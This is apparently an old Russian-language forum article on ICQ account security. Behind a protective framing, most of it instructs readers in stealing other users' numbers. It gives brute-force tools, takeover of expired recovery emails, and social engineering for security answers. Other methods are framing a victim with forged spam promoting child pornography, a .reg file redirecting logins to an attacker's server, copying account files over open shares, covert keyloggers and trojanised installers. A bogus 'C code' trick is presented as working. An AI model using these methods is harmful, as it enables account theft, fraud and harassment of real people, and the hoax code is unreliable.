http://i033.radikal.ru/0810/b6/5397ef8fd135.jpg

Код:
Краткая экскурсия в мир хакерсих уловок для всеми любимого клиента общения...


Редко удается встретить пользователя Интернет, который не знает об «Аське». ICQ стал самым популярным клиентом для обмена сообщениями и файлами во всемирной компьютерной сети. На данный момент зарегистрировано более 180 миллионов пользователей. Разумеется, некоторые получали номер не один раз, но даже если сделать грубое предположение о наличие у каждого пользователя около 5 уникальных регистрационных записей, то все равно цифра рисуется самая впечатляющая. 

Трудно представить завтрашний день без ICQ. Некоторые компании выбрали этот способ общения между своими сотрудниками за основной. Все давно перекочевали из небытия трудовых будней в небольшое окно с никами, которое находится на своем привычном месте справа. Всегда в курсе дел и легко планируются встречи. Прочел интересный анекдот или увидел забавную картинку - и ссылка мгновенно разносится ко всем знакомым. Удобство, доступность, простота и эффективность ICQ - сделали из этого сервиса настоящего гиганта сетевой популярности. У него, как и у других культовых клиентов появились клоны. 

В один прекрасный день вы можете остаться без своего номера ICQ. Разумеется, если вы не боитесь его потерять и готовы сразу получить новый, то вам не стоит беспокоиться. Однако, если вам дорог Ваш UIN (уникальный идентификационный номер) и вы не хотите тратить время на налаживание новых контактов, то стоит предпринять некоторые меры для защиты.

К сожалению, стандартная система помощи не дает полной информации по возможностям Аськи. Разработчики вложили в свой труд несколько больше, чем заявлено. 

Зачем защищать свой ICQ? Этот вопрос очень разумен. Действительно, прежде чем сделать что-либо, стоит разобраться с задачами, которые вы преследуете. Люди, живущие с таким принципом, как правило преуспевают в жизни. Наверно, вы уже сталкивались с электронной торговлей. Бизнес в сети очень привлекателен для многих. Продавцу не нужно тратить время и средства на некоторые промежуточные стадии размещения и движения товара. Если же речь заходит о виртуальных продуктах (это могут быть программы и утилиты, либо «примочки» к ним), то лучше прилавка «WWW» найти очень сложно. 

К сожалению, о прелестях и нюансах торговли во всемирной паутине в первую очередь прознали не совсем честные люди. Действительно, без особых проблем можно отделить продавца от товара, тем самым оставив в стороне данные о человеке или группе лиц предлагающих тот или иной лот. Впрочем, вы и сами, наверно, много слышали о преступных махинациях, которые осуществлялись через всемирную паутину. Слухи на пустом месте, как правило, не появляются. 

Очень часто в сети можно заметить предложение о продаже UIN. Самые известные Internet аукционы, например eBay, выставляют на своих торговых площадках лоты с UIN самого разного вида. Чаще всего вам прелагаются номера ICQ состоящие из пяти цифр – они легко запоминаются. Это короткие UIN. Согласно неофициальному сетевому мнению они принадлежат хакерам или очень крутым компьютерщикам, которые давно сидят в сети. Если вы встречаете такого человека, то, как правило, он получает существенный аванс доверия. Это не случайный компьютерщик, он давно сидит в сети и, скорее всего, он дорожит свои номером, не станет компрометировать его. Купить номер состоящий из 4 и меньше цифр практически не реально. Хотя если вы располагаете достаточной суммой денег, то ничего невозможного не бывает. Поместите свое объявление о покупке и вам ответят множество людей. Будьте уверенны, что больше половины откликнувшихся окажутся профессиональными мошенниками. Они знают все возможные способы, чтобы обвести вас вокруг пальца. 

Существуют специальные нелегальные сервисы, где вы можете заказать себе номер на заказ. Например, цифры UIN будут походить на ваш телефонный номер. Разумеется, можно получить такой номер перекупив его у настоящего обладателя, но, как правило, такие сделки не проходят. Хакеры готовы за меньшие деньги украсть UIN и продать вам. Популярностью пользуются «красивые» номера. Например, 9999900. Одним словом, вы можете получить все что вам заблагорассудится, только платите деньги. 

Существует в основном три сравнительно простых способа для хакера, чтобы украсть ваш номер ICQ. Это: взлом через e-mail (на данный момент не сильно эффективен), троянская программа и домашняя страничка ICQ пользователя.

При регистрации ICQ вам было предложено ввести свой адрес электронной почты. Безусловно, это удобно. Друзья могут прочесть соответствующее поле и отправить вам письмо. Однако именно эта, казалась бы, самая разумная возможность стала основной дыркой, через которую честные номера утекают к хакерам. Все дело в сервисной системе http://www.icq.com/password/. Она помогает не только тем, кто забыл свой пароль (достаточно зайти туда, ввести номер вашей ICQ и e-mail, зарегистрированный в списке ваших, и на него придет пароль), но и тем кто его никогда не знал. Правда, попадаются больше всего неаккуратные люди. Например, вы, желая «обезопасить себя» ввели несуществующий адрес в отсутствующем домене - [email]5678@takogotochno.net[/email]. Хакер проверяет существование такого домена. Регистрирует его и получает там любой адрес. Далее ему остается выслать себе ваш пароль и преступить к процессу перерегистрации. Все просто и банально. Поле, выделенное на рисунке, должно быть пустым для вашей ICQ.

Бесплатные почтовые сервисы (они же свободные) имеют только одно достоинство – они не делают ваш кошелек легче. Пользователи, регистрирующие почтовые ящики в таких местах, часто меняют их, ища более надежные и лучшие. Почтовые сервисы в свою очередь не любят долго хранить невостребованные электронные адреса. Через определенный интервал времени пользователь будет удален из системы. Хакеру надо проверить существует ли почтовый ящик, указанный в ICQ, в соответствующем сервисе. Если такого нет, то после регистрации злоумышленник вышлет пароль себе. Кроме этого, вы наверно заметили в новостных лентах о взломах крупных бесплатных почтовых системах. Пожалуй, самым громким было объявление о том, что приватные ящики на hotmail.com доступны всякому. В сети можно найти информацию о том, как получить доступ к любому электронному адресу типа [email]member@hotmail.com[/email]. Проблемы в первую очередь - это не дело злой хозяйки судьбы, а нас самих, наша беспечность и безлаберность.

Бесплатный и популярный e-mail адрес может обернуться для вас огромной головной болью. Будьте очень аккуратны. А лучше оставьте поле для электронного адреса в ICQ пустым. В конце концов, ваш друг всегда может его спросить у вас.

Второй по популярности способ для взлома вашей аськи – «троянские» программы. Как правило, они попадают на компьютер с электронной почтой в виде прикрепленных файлов. После того, как «троянская» программа будет запущена она считает нужную ее хозяину информацию и отошлет ей. Способов борьбы не так много, зато они крайне эффективны. Поставьте хороший антивирус и ни в коем случае не запускайте вложенные файлы из писем, полученных от незнакомых людей, даже если на первый взгляд они содержат самую безобидную информацию. 

Последние версии ICQ позволяют пользователю создавать домашние странички. Идея очень хороша, но реализация не на совсем высоком уровне. Другими словами, создать страничку очень просто и легко, но она может стать ахиллесовой пятой для вашей системы. Когда вы создаете на своем компьютере web-сервер, то автоматом открываете 80 порт. При грамотной реализации этого процесса ничего страшного вас не ждет, но стандартные средства ICQ создают в вашей системе дырку. Через которую любой пользователь может получить доступ к любой информации на вашем компьютер. Если он знает, что и где надо взять, а потом вынуть необходимую информацию из полученных файлов (обычно она не хранится в открытом виде, но программисты наплодили множество утилит, которые без труда делают это), то ваше дело «табак». Запомните, решили создать ICQ Homepagе – скачайте специальную утилиту, которая закроет дырку стандартного пакета.

Очень тонкое место любой системы паспортизации - пароль. В некоторых случаях его можно подобрать, а иногда и угадать. В сети абсолютно бесплатно распространяются самые разные утилиты для взлома пароля ICQ. Некоторые из них занимаются простым подбором последнего. Создатели таких «чудес» были люди творческие и работа их программ лично меня впечатлила. В связи счастыми взломами было поставлено пару ограничений в ICQ: нельзя с одного ip адреса подключаться к серверу ICQ с ошибками пароля и задержка 7 секунд на повторный ввод. Поздно. Хакеры давно обошли эти запреты. «Умные» утилиты предварительно собирают всю доступную о вас информацию и занимаются «интеллектуальным» подбором пароля. Так что Димы и Васи, использующие для паролей свои имена и фамилии набранные латинскими буквами, прощаются со своими UIN первыми.

Придумывая пароль к системе освободите свой разум от всего близкого и человечного. Используйте случайным образом буквы латинского и русского алфавита с учетом регистра, кроме этого примешайте сюда цифры и ни в коем случае не дайте вашей Аське хранить пароль у себя. Применение многострочных паролей так же существенно повысит безопасность. Вводить их можно установив на систему специальные плагины.

Существует программная защита вашей ICQ. Для понимания смысла ее установки и работы обратимся к ходу мыслей хакеров. Для получения определенного контроля над ситуацией злоумышленник должен получить ip-адрес жертвы и номер порта, через который работает Аська. Ваша задача скрыть эту информацию. IP адрес при прямом подключении скрыть скорее всего не удастся, а вот создать проблемы для хакера при сканировании портов можно. Установите программы ICQAport, ICQProt, WFips2 или WFips3. Все они делают одно и тоже. Аналоги данных утилит можно легко найти в сети. Утилиты открывают ложные соединения на портах, на которых обычно работает аська, затрудняя определение истинного порта работы с сервером. В терминологии военных - создание ложных мишеней. Существует несовместимость версий, так что экспериментируйте и подбирайте. Всё данное программное обеспечение можно смело и быстро разыскать в любом поисковике за пару минут. 

При всех выше приведенных защитах у хакера остается возможность дотянуться до вас. Лишить его этой радости помогает использование прокси-серверов для ICQ. Безусловно, это не всегда удобно в практическом плане, но зато из-за прокси до вас не доберется ни одна программа «флюдер» или «убийца». Вы получите анонимность, о которой могли только мечтать. В главном меню ICQ выбираете пункт «Preferences», далее «Connections».Теперь заходите в подменю «Firewall» делаете активным позицию «Socks4». В поле «Host» наберите следующий IP - 207.98.240.77. Socks4 port так и оставить 1080. Теперь хакер будет видеть ваш ip-адрес таким - 207.98.240.77. (Настройки вашей ICQ могут несколько отличаться от приведенных, так как в разных версиях ICQ они делаются по своему. Если это так, то сделайте все по аналогии.) За стеной прокси можно отсиживаться очень долго. 

Берегитесь знакомых «шутников», которые в ваше отсутствие могут побаловаться с вашим компьютером. Пусть даже без злого умысла, они могут поспособствовать утечки с вашего компьютера полезной информации.

Всем известно, что одна Израильская компания является разработчиком ICQ, у них больше всего 6 значных, и разных красивых асек, а также USA, Germany, England. Следующий способ угона: берётся программа Uin2IP, заносится какой-нибудь номер в себе в контакт лист и определяем у него IP, дальше открываем прогу Essential Net tools и сканируем весь диапазон данного IP адреса на расшаренные ресурсы, дальше открываем найденные открытые компьютеры и ищем программную директорию системы? обычно: C:Program files.
Если вы там обнаружили папку ICQ, то вам повезло, т.к. вы теперь можете получить пароль к этой аське. Качаем себе все файлы с расширением *.dat , и открываем при помощи проги Icq information, для шестых версий - ICQ6 Hash Recover, затем перебор хэша MD5 программой MD5Inside, или сразу же можно создать соединение с утилитой ICQ MD5-Password Changer, использующей для авторизации не стандартный пароль, а програ-й MD5-хэш пароля. Всё просто.

Этот способ является мало эффективным, расчитан больше на удачу. Но именно таким способом начинались первые угоны понравившихся номеров.

Большинство пользователей своим паролям ставят: свой ник, имя, день рождения или свой город.

Открываем белые страницы ICQ и пишим в полях Last, First, и т.д. - одно и то же имя, сочетание букв, или просто цифры, нажимаем "Search" и у нас появляется много пользователей c различными номерами. Чаще всего то, что мы ввели в полях Last, First - и является паролем. Для быстроты проверки пароля к аськe используйте прогу ICQ SubMachineGun. 

Этим способом можно вскрыть 8-значные номера, но за 6 и 7-значные номерки вам придется попотеть, т.к. опытные пользователи уже давно все подчистили.

Перебор aka Brute Force - пожалуй, самый эффективный способ угона любого пароля:
Обычно, нужные для этого программы: простой генератор списка типа уин: пароль, переборщик сам: Wzbrute, Sbrute или IPDbrute, желательно второй версии, хороший список прокси, желательно анонимных.

Ещё один старый давний способ, основанный на одной уязвимости в ICQ: открываем аську - там жмём на кнопку "Find Users". В поле ICQ - пишем номер, который нужен. Отправляем сообщение и ждём ответа. Неважно что - даже если он напишет хоть одну букву в ваш адрес - то отправляйте ему слудующее:

----------------------------------
#include
void main
{
printf("lamer not die");
scanf(#icq)
printf("%icq : %password");
send(youarelamo@polnoeprichem.ru)
}
----------------------------------

Там где написано "#icq" - вы должны указать номер которому посылаете всё это. А там где написано "send(...)", то в скобках вы должны указатьв ваш e-mail на который и придёт номер вместе с паролем. То есть, где-то через 5 минут (поскольку серверу icq.com нужно обработать запрос) после того как вы послали код, вы смело можете идти и проверять e-mail который указали в коде. Там должна быть следующая картина:

ICQ:701707 - здесь будет номер который вы хотели.
Password:xxxxx - а здесь вместо звёздочек будет пароль.

Всё банально просто.

Но есть одна проблема. Если вдруг оказалось, что номер с паролем не пришёл вам на ящик. Это могло возникнуть по той причине, если человек, у которого вы хотели увести номер пропатчил свою версию клиента. Тогда Вам придётся сделать следующее:
Добавляйте номер в свой контакт лист и посылайте ему тот код. Если же у него стоит авторизация, то вам надо каким-либо способ добиться у него авторизации ! Если он вам даст добро на добавление своего номера в ваш контакт лист, то считайте что номер у вас в кармане. Отправляйте ему код и на почту за своим новым красивым номерком.

Краткий обзор ещё одного способа:

The Bat 1.62
C4 Pass changer
Advanced MailList Verifier
База Primary E-mail с www.asechka.ru

Возьмём к примеру известный домен - www.bigfoot.com. Вводим в строке поиска *@bigfoot.com, Но так как максимальное количество мыл, которые показывает поиск - 512, придётся использовать более жёсткий критерий. Начинаем проверять все буквы алфавита. Ищем по маске: a*@bigfoot.com. В итоге получаем определённый результат. Следующий шаг: проверить какие адреса существуют, а какие нет. Выделяем все записи и отрезаем первые 7 символов. В итоге получаем список адресов.

Загружаем список в Advanced MailList Verifier и проверяем. Почта www.bigfoot.com врёт часто. Затем начинаем проверять адреса, которые вроде несуществующие. Пытаемся зарегистрироваться. Одно но: указывайте там ваше реальное мыло, т.к. именно туда придёт пароль. Если почта готова, значит идём туда, которую указали в регистрационной форме. Там лежит письмо с логином и паролем. Заходим на www.bigfoot.com, используя этот логин и пароль. Ещё одно но. Прямо оттуда вы не сможете проверить почту. Так что настраиваем переадрессацию. На тот же самый адрес. Опять идём на тот же адрес почты и подтверждаем переадрессацию. Всё. Теперь высылам пароль на почту в домене www.bigfoot.com, и ждём переадрессованного письма на ваш почтовый ящик. Лучше высылать с www.icqinfo.ru/tools/ - меньше проблем.

Краткий критерий взлома:
1)Искать по маске e*@bigfoot.com
2)Регистрация адреса: e******@bigfoot.com
3)Номер был: acb-dab
4)Выслать пароль, и тут проблема.... 
Пришло письмо, а вместо пароля, пустые строки...

Итак, после расшифровки пароль будет вида: 13 10 10 13 10 13 13 10

Поможет программа C4 Pass changer. Именно в ней можно вводить пароль как в plain text так и в Decimail.

Если человек не подключен к Сети — он защищен от взлома. Если человек пользуется устаревшим или, наоборот, сильно новым программным обеспечением, то вероятность взлома его компьютера велика. Если человек пренебрегает патчами, то он уже почти мертв. Если человек пользуется какими-то программами для работы с Сетью, то существует потенциальная опасность получить удар именно от них и из-за них. 

Несомненно, на первом месте обычно стоит браузер (MSIE, Opera, Netscape, Lynx). В них всегда находили и будут находить большое число ошибок. Не менее часто используюстся и почтовые программы (Outlook Express, The Bat), и в их контексте говорить про вирусы уже даже и неприлично — достаточно только почту забрать, и очередной червь тут как тут. 

Сетевые средства общения. К ним относятся ICQ, Yahoo! Messenger, Odigo и другие. Несомненно, это очень удобные средства для общения, предоставляющие гораздо больше возможностей, нежели при работе с электронной почтой. Интересно заметить, что у ICQ время ее соединения с Интернетом обычно гораздо больше, чем у того же браузера, потому как «аська» автоматически отслеживает подключение и висит на нем все время соединения. Естественно, шанс атаки из-за этого растет. А терять есть что. Самое безобидное, что может случиться — злоумышленник узнает ваш пароль и выдаст себя за вас. Пусть он и не знает ничего о ваших собеседниках, если, конечно, вы не пользуетесь ICQ 2001, которая хранит лист контактов на сервере до тех пор, пока они не пришлют сообщений, однако он вполне можно похитить всю базу, заполучив тем самым весь архив сообщений. В ICQ99, помнится, было специальное окошечко, отображающее IP пользователя - если он, конечно, это разрешил. Из ICQ2000 его убрали, ведь таких умников, много находится, однако в Сети вполне можно найти программы, оное окошко возвращающие. Если удалось переписать базу ICQ с чужого компьютера, то по листу контактов пользователя можно определить IP-адреса его товарищей и залезть еще и на их компьютеры и так далее — получается цепная реакция. А база ICQ представляет собою просто файл вида номер_аськи.dat, лежащий в каталоге самой программы. Хранятся же в нем архив всех сообщений, информация о пользователях, все настройки и многое другое. Вот что дает простое знание IP-адреса. Способ защиты один — не давать это знание. Прежде всего нужно задать наивысший режим безопасности. Теперь для того, чтобы поменять настройки или просто начать пользоваться программой, надо будет ввести пароль. Включать авторизацию удаленного пользователя или нет — личное дело каждого, но все же рекомендованно бы включить. Хотя есть программы, которые изменяют ICQ в обход авторизации, причем доходит даже до того, что, когда пользователь поломанной аськи добавляет вас, всячески «защищенного» авторизацией в свой лист, ваша ICQ может просто вылететь. Еще одна раздражающая неприятность использования ICQ — спам aka поймать при этом трояна. Сразу же после регистрации адреса ICQ обязательно приходит сообщение с приглашением посетить порносайт. К сожалению, автоматизировать процесс спама на аську достаточно просто - ведь если отправить e-mail на номер: [email]_icq@pager.icq.com[/email], то данное письмо как раз и преобразуется в сообщение. Хочешь кого-то достать — пишешь скрипт на Perl, вешаешь на автомат и раз в минуту радуешь человека бранью или рекламой.

Маленькое дополнение по угону Primary E-mail:

Существует другой, более сложный варинт лишeния пользователя его e-mail. Есть конкретные правила поведения пользователей сервиса (например: e-mail - нельзя спамить, web - нельзя открыто размещать детское порно), нарушая которые пользователи, как правило, лишаются права на адрес или веб-страницу. Кто мешает вам написать несколько десятков тысяч воззваний к легализации детской порнографии и проституции от имени [email]duke@something.com[/email]? Установите тип сервера, узнайте язык общения с ним клиента, и пошлите все эти возвания самому себе и своим друзьям, указав обратным адресом [email]duke@something.com[/email]. Далее вы и ваши друзья должны будете переправить все "полученное" от Duke по адресу администратора домена с нотой протеста против легализации и с просьбой наказать виновного. Попросите администратора обязательно держать вас в курсе дела. Далее пошлите сообщение того же самого содержания (используя обратный адрес Duke) другим вашим друзьям или на другие почтовые аккаунты, и напишите администрации о этом безобразии в других словах. Аккаунт быстро удалят. Вы в тот же день зарегистрируете аккаунт на себя и заявите о потере пароля.
Будте внимательны, каждое электронное сообщение содержит заголовок (header), представляющий из себя служебную информацию о дате отправления сообщения, названии почтовой программы, IP адресе машины, с которой было отправлено сообщение, и т.д. Поэтому исполюзуйте для этих целей специальные программы для спама, которые способны скрыть эту информацию. Вот некоторые из них: SendIt, EzyMassMailer, CTMailer, MailThemPro и запускайте их через прокси сервер. У большенства спамеров отсутствует в настройках возможность работать через прокси, но это легко поправить с помощью программы SocksCap (программа, позволяющия запускать через сокет любое приложение, о нем не знающее), для коннекта используется проски SOCKS-4 или SOCKS-5 port:1080. Из-под SocksCap вы можете запускать сканеры портов и практически любые программы, скрывая свой реальный IP. Это очень актуально сегодня, т.к многие провайдеры за эти "маленькие шалости" лишают пользователей доступа в сеть.

Если почтовый ящик защищён хорошо, и взломать его нельзя, можно попробовать получить его пароль. Дело в том, что людям свойственно забывать многие полезные вещи, в том числе и пароли. Поэтому у любой службы бесплатных почтовых ящиков есть некий механизм, с помощью которого можно восстановить "забытый" пароль. При этом вам придётся подтвердить, что вы и есть хозяин того самого ящика. Как правило, для этого необходимо знать краткую информацию о пользователе, такую как имя, фамилия, дата рождения, адрес и т.д. Кроме того, почтовые службы практикуют следующий механизм: при регистрации пользователю предлагается сформулировать некий вопрос личного плана и дать на него ответ. Если потом пользователь заявит об утере пароля, ему будет задан этот вопрос, и если ответ совпадёт, это будет считаться подтверждением личности пользователя. Так вот, 90% пользователей используют вопросы типа "Как зовут мою собаку?", "Какая марка моего автомобиля?" и т.п., причём уже через год после регистрации они гарантированно не помнят, какой именно вопрос ими был указан. Поэтому, достаточно получасового общения по аське, чтобы как бы случайно сказать что-то вроде "Я очень люблю свою собаку! А у тебя есть собака? А какой породы? А как её зовут?". Если правильно выбрать время и задать вопрос как бы между делом, пользователь наверняка ответит на него, ничего не заподозрив. Точно таким же образом можно узнать и всю остальную информацию, необходимую для получения "забытого" пароля, если, конечно, она не указана в пользовательских деталях ICQ. Если системы автоматического восстановления забытого пароля в данной почтовой службе нет, вам придётся написать слёзное письмо постмастеру, где необходимо будет указать всё те же данные о пользователе.

Социальная инженерия:

Например, если почтовый ящик пользователя расположен у его провайдера, и он использует POP3-доступ, подойдёт письмо об изменении ip-адреса почтового сервера. Если жертва внесёт указанные вами изменения в настройки своей почтовой программы, то он сам выложит вам свой пароль, связавшись с любезно предоставленным вами подставным POP3-сервером. 

Очередной способ перехвата:

Если вы имеете представление о протоколах, по которым ICQ-клиент регистрируется на сервере при каждом подключении к сети, вы можете взять пароль непосредственно из перехваченного сетевого траффика. Для такого перехвата могут быть использованы различные способы. Если владелец UIN'а находится в вашей локальной сети, вы можете применить сниффер. Если нет, попробуйте сделать так, чтобы он запустил на своём компьютере .reg-файл, содержащий (помимо полезных действий, например оптимизации файловой системы Windows) строки: [HKEY_CURRENT_USERSoftwareMirabilisICQDefaultPrefs] "Default Server Host"="Имя или ip-адрес вашего сервера" На этом сервере вам необходимо будет выделить из траффика всю нужную вам информацию, а затем перенаправить его на icq.mirabilis.com. То же самое можно сделать, используя "фальшивый" прокси-сервер.

Удаленный доступ к компьютеру. Данный метод подразумевает некоторые навыки общения с программами и методами, предоставляющими возможности удаленного доступа к компьютеру, на котором установлена аська с интересующим вас номером. Кроме того, возможно удалённое подключение к компьютеру жертвы через 139-й порт по протоколу NetBIOS. Очень часто ресурсы, доступные через этот порт, вообще не имеют пароля, а если этот пароль и присутствует, подбирать его намного быстрее и удобнее, чем, например, регистрационный пароль ICQ. Для этого существует огромное количество специализированных программ, наиболее популярная - Legion. Вам нужно всего лишь получить системные файлы аськи. А именно: "номер_аси.dat и номер_аси.idx". Это если ася проинсталлирована в каталог по умолчанию. Остальные файлы для этого UIN-на вы сможете сфабриковать из аналогичных файлов любого другого номера. После этого, корректно изменив информацию в системном реестре, вы сможете сконнектиться под данным номером. 

Изменение пароля чужого ICQ аккаунта без получения доступа к компьютеру его владельца. 

Когда-то, во времена icq98, это было возможно. Существовала программа для взлома ICQ под названием "ICQhijeck" (или "ICQhijeek"). При наличии IP жертвы, его UINa и номера порта для связи с клиентом, ICQhijeck посылал spoofed пакет, заявляющий о себе, что пакет принадлежит самому клиенту и несет в себе задачу смены пассворда. Пассворд выбирал нападающий. В конце концов Mirabilis убрал этот баг.

Ещё одна старая уязвимость состояла в том, что при активированном ICQ homepage, был возможен доступ к локальным файлам, используя обратный путь к директориям. Начиная с 99-х версий, ICQ предоставляет пользователям новую, достаточно удобную и простую в реализации возможность - создать небольшой персональный веб-сервер. При этом, от пользователя требуется минимум усилий - достаточно выбрать в меню Services -> My ICQ Page -> Activate Homepage. При этом открывается доступ к виртуальному серверу, который по умолчанию расположен на 80 порту компьютера пользователя. Причём этот сервер, без всякой настройки, способен выполнить большинство функций, необходимых типичной домашней страничке. И все бы было хорошо, если бы ни одно: в ранних версиях icq 99 был возможен доступ к любому файлу на компьютере пользователя, используя адреса вида: http://текущий.ip.адрес.пользователя/.html......./config.sys. Вообще говоря, обратный путь - одна из самых типичных ошибок http-серверов. Практически все известные веб-сервера имели тот или иной вариант этой ошибки в своих ранних версиях, и ICQ не стало исключением. Лишь начиная с версии 3.19 эта дыра была закрыта, и всего доступа к файлам пользователя, обращение к подобным адресам стало приводить к стандартной ошибке 403 Forbidden. Тем не менее, пользователей со старыми версиями ICQ всё ещё можно встретить в сети. 


Если у вас есть прямой доступ к компьютеру, на котором стоит интересующая вас ася (или находится любая другая нужная вам информация), просто принести на дискете и установите клавиатурного шпиона, когда жертва не будет видеть. Вы сможете узнать что, где и когда набиралось на клавиатуре. У вас в руках будет вся интересующая вас информация. 


В конце концов, ICQ UIN можно просто купить. При этом ваша совесть будет почти чиста - вы можете искренне убеждать себя, что купленный вами номер с самого начала принадлежал продавцу и не является краденым. Правда, в этом случае вы должны всегда быть готовы к тому, что в один прекрасный день объявится законный владелец вашего "нового" UINa, и деньги заплаченные за него, окажутся выброшенными на ветер. Да и никто не даст вам гарантию, что после успешно завершённой сделки, UIN не будет украден повторно, на этот раз уже у вас.

В декабре 2004 года произошло одно знаменательное событие, а именно многие номера-невидимки (те, которые были невидимками примерно в мае 2004 года) отвязались от своих примари. 

В список существующих 5-значных номеров не включены боты и сервисы: 35000 (SmarterChild), 36000 (Agent Reuters), 36001, 36002, 36003, 36004, 37000 (RingMessenger), 37001, 37002, 37003, 37004, 38000 (ELLEgirlBuddy), 38001, 38002, 38003, 38004, 76667 (Service of Dow Jones & Co., Inc.)


Популярные клиенты Jimm и прочее - тоже не приносят радость. Обычно в каждой программе существует некая область нулевых данных, обычно это начало или заголовок программы, или её конец. Связанно это обычно с неправильной компиляцией кода в таких программах, как С++, Delphi и т.д. Обычно, после такой компиляции - в теле программы остаётся много мусора, технической информации, даты компиляции программы и прочее. Это всё спокойно можно заменить своим кодом, без изменения размера самой программы. Не спасёт даже измерение контрольной суммы файла, программные хэши и т.д. В сети часто ходят протроян-е инсталляционные пакеты известных "болталок", таких как ICQ, Miranda и т.д. Скач-й официальный установочный файл с сайта производителя, пару минут работы в компиляторе и отладчике, и готов уже пакет для выкладывания в сеть, под новым названием - свежое обновление от разработчиков Квипа, Миранды.....

Даную статью можно продолжать бесконечно.......

Официальным знаком ICQ-хакеров уже давно стал этот знак, в виде зелёного цветка, в центре которого несколько мышей грызут серединку сыра....символа беспечности некоторых пользователей.

Мир Интернет очень интересная вещь, однако без общения он теряет очень много. Сервис ICQ стал свежей струей в этой сфере. Четырем израильским парням удалось вдохнуть в холодный сетевой трафик толику дружественного общения. Благодаря ICQ, находясь на работе, мы ощущаем близость друзей. Общение перешло на качественно новый уровень. Впрочем, не стоит забывать, что на просторах только становящейся на ноги всемирной сети обитают не совсем порядочные люди, которые смогут причинить вам беспокойство. Постарайтесь обезопасить свое общение с друзьями и знакомыми.


По материалам различных статей и наработок хакерских и крекерских команд, таких как tEaM wOrLd cRaCk kZ, STEIN UNiON и PACiFIC TEAM

Защита всегда равноценна с методами посягательства на неё...